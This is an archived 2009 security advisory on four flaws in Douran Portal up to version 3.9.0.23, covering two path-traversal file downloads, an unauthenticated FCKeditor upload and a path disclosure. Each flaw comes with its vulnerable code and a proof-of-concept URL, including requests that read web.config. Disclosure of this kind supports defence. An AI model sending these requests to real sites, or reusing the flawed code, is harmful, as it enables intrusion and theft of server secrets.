Abysssec Inc Public Advisory
Description :
these vulnerabilites found one year ago and new version of this portal "is not" affect whith these vulnerabilites anymore
but still lots of web site uses of old version and are vulnerable and also new version is not "fully secure" . so because of patching there
is no point to keep these private anymore these vulnerabities are just for educational purpose and author will be not be responsible
for any damage using this vulnerabiltes .
Discovery : www.Abysssec.com
Title : Douran Portal Multiple Remote Vulnerabilities
Affected Version : DOURAN Portal <= V3.9.0.23
Vendor Site : www.douran.com
Vulnerabilites :
1- File Download Vulnerbility in /Admin/ImportExport/download.aspx
Vulnerable Code :
string strFileName = Request.Params["Filename"];
if((strFileName != null) && (strFileName != ""))
string strPath = Server.MapPath("../../_DouranPortal/ExportPortal");
strPath += "\\" + strFileName; // Vulnerablity
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Transfer-Encoding", "binary");
Response.AddHeader("Content-Disposition", "attachment; filename=\"" + strFileName + "\"");
PoC : http://www.vulnerable.com/Admin/ImportExport/Download.aspx?filename=../../web.config
2- File Download Vulnerbility in /download.aspx
Vulnerable Code :
string fileNameAttach = Request.Params["FileNameAttach"];
string filePathAttach = Request.Params["FilePathAttach"];
string originalAttachFileName = Request.Params["OriginalAttachFileName"];
if((fileNameAttach != null) && (filePathAttach != ""))
string strPath = Server.MapPath(filePathAttach + "/" + fileNameAttach); // Vulnerable
System.IO.Stream iStream = null;
// Buffer to read 1 mega bytes in chunk:
int segmentLegthToRead = 1024 * 1024;
byte[] buffer = new Byte[segmentLegthToRead];
PoC : http://www.vulnerable.com/download.aspx?FileNameAttach=/web.config
3- File Upload Vulnerability DesktopModules/fck/editor
Vulnerablity :
Using Fckeditor without any authentication will give ability to attacker to
upload his / her own file and fckeditor won't check file extention
it will give ability to attacker upload a malicius server side ASP / ASPX / PHP / JSP .
so this vulnerability can creation access to server / portal completely .
PoC : http://www.vulnerable.com/DesktopModules/fck/editor/filemanager/upload/test.html
4-Path Disclosure Vulnerablity In DesktopModules/DesktopCalendar/HZAN_pickercal.aspx
Vulnerable Code :
Calendar1.FullWidth = true;
Calendar1.BigCaledar = bool.Parse((string)Request.QueryString["calsize"]);
if (!IsPostBack)
Calendar1.Date = new DateTime(long.Parse((string)Request.QueryString["curd"]));
Calendar1.CalendarCulture = (HZAN.Calendar.CultureType)Enum.Parse(typeof(HZAN.Calendar.CultureType),(string)Request.QueryString["culture"]);
seldate = Calendar1.Date.ToShortDateString();
PoC : http://www.vulnerable.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize='
Final Note : for advanced security topics / sharing idea and etc ... please feel free to contact me at : admin [at] abysssec.com
# milw0rm.com [2009-05-18]